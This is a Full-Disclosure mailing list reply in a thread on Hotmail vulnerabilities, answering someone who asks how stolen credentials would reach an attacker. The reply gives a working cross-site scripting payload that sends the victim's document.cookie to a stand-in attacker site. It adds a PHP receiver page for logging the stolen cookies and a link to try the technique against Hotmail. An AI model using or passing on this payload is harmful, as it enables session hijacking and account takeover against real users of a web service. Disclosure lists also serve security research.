Re: [Full-disclosure] Re: [VulnWatch] Hotmail Advisories

> Ok I think I get what you are saying, however to use this vuln, would
> need to have a script running on a server some where that recieves the 
> username and password?
>
> Or just based on what you have here this can be possible. If one does not 
> have knowledge of java script, all the would have to do is use those 
> various html codes you wrote and send that to them as an attachment, but 
> how would I get the username and password ????

For example, this is a simple way to steal a cookie:

Inject this code:

<script>window.open('http://www.your-malware-website.com/givemecook.php?cook='%2Bdocument.cookie);</script>


And on "your-malware-website" put this page:

givemecook.php:
<?
echo $HTTP_COOKIE_VARS["cook"];
?>

and so, the cookie will be logged in "your-malware-website"


> > I was testing this until I can get some working code, the authorization 
> > and
> > validation of the site is one of the better that I seen on a mailing 
> > system,
> > I never heard about vulnerabilities of hotmail as in others systems, I 
> > just
> > have knowledge of two flaws discovered. One on 1999 is from George 
> > Guninski,
> > and the other when the pwdreset function make its public, every year 
> > hotmail
> > is updated, and getting more secure, and it's hard to believe that no one
> > have found this before.

Try to play with this in hotmail
http://seclists.org/lists/bugtraq/2005/Feb/0473.html

Cheers,
Jerome 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/